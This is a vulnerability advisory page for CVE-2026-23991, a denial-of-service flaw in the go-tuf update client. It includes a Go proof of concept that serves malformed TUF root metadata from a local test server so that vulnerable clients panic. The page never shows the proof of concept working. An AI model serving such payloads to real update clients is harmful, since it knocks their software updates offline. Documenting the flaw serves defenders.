Security Vulnerability Report
CVE-2026-23991 CVSS 5.9 MEDIUM

CVE-2026-23991

Published: 2026-01-22 03:15:47
Last Modified: 2026-02-17 16:10:56

Description

go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, if the TUF repository (or any of its mirrors) returns invalid TUF metadata JSON (valid JSON but not well formed TUF metadata), the client will panic during parsing, causing a denial of service. The panic happens before any signature is validated. This means that a compromised repository/mirror/cache can DoS clients without having access to any signing key. Version 2.3.1 fixes the issue. No known workarounds are available.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:* - VULNERABLE
go-tuf 2.0.0 <= version < 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
// CVE-2026-23991 PoC - Malformed TUF Metadata JSON causing DoS
// This PoC demonstrates a malformed TUF metadata that triggers panic in go-tuf < 2.3.1
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

func main() {
	// Malformed TUF metadata that causes panic during parsing
	// This JSON is valid syntax but violates TUF metadata specification
	malformedMetadata := `{
  "signed": {
    "_type": "Root",
    "spec_version": "1.0.0",
    "version": 1,
    "expires": "invalid-date-format",
    "keys": {
      "keyid": {
        "keytype": "ed25519",
        "keyval": { "public": null }
      }
    },
    "roles": {
      "targets": { "keyids": ["keyid"], "threshold": -1 }
    },
    "consistent_snapshot": "not-a-boolean"
  },
  "signatures": []
}`

	// Create a malicious TUF server that serves malformed metadata
	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", "application/json")
		fmt.Fprint(w, malformedMetadata)
	}))
	defer server.Close()

	fmt.Println("Malicious TUF server started at:", server.URL)
	fmt.Println("Serving malformed metadata to trigger DoS...")
	fmt.Println("Any client using go-tuf < 2.3.1 will panic when parsing this metadata")
	fmt.Println("\nMalformed metadata content:")
	fmt.Println(malformedMetadata)
}

// Note: To trigger the vulnerability, a TUF client would try to update
// from this malicious server. The parser will panic before signature
// verification due to invalid JSON structure per TUF specification.

References

https://github.com/theupdateframework/go-tuf/commit/73345ab6b0eb7e59d525dac17a428f043074cef6 (Patch)
https://github.com/theupdateframework/go-tuf/releases/tag/v2.3.1 (Release Notes)
https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-846p-jg2w-w324 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-23991",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-22T03:15:47.317",
    "lastModified": "2026-02-17T16:10:55.810",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, if the TUF repository (or any of its mirrors) returns invalid TUF metadata JSON (valid JSON but not well formed TUF metadata), the client will panic during parsing, causing a denial of service. The panic happens before any signature is validated. This means that a compromised repository/mirror/cache can DoS clients without having access to any signing key. Version 2.3.1 fixes the issue. No known workarounds are available."},
      {"lang": "es", "value": "go-tuf es una implementación en Go de The Update Framework (TUF). A partir de la versión 2.0.0 y antes de la versión 2.3.1, si el repositorio TUF (o cualquiera de sus espejos) devuelve JSON de metadatos TUF no válido (JSON válido pero metadatos TUF no bien formados), el cliente entrará en pánico durante el análisis, causando una denegación de servicio. El pánico ocurre antes de que se valide cualquier firma. Esto significa que un repositorio/espejo/caché comprometido puede DoS a los clientes sin tener acceso a ninguna clave de firma. La versión 2.3.1 soluciona el problema. No hay soluciones alternativas conocidas disponibles."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-617"},
          {"lang": "en", "value": "CWE-754"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.0.0",
                "versionEndExcluding": "2.3.1",
                "matchCriteriaId": "6442E623-C25E-418E-A418-324F815885AF"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/theupdateframework/go-tuf/commit/73345ab6b0eb7e59d525dac17a428f043074cef6", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/theupdateframework/go-tuf/releases/tag/v2.3.1", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-846p-jg2w-w324", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}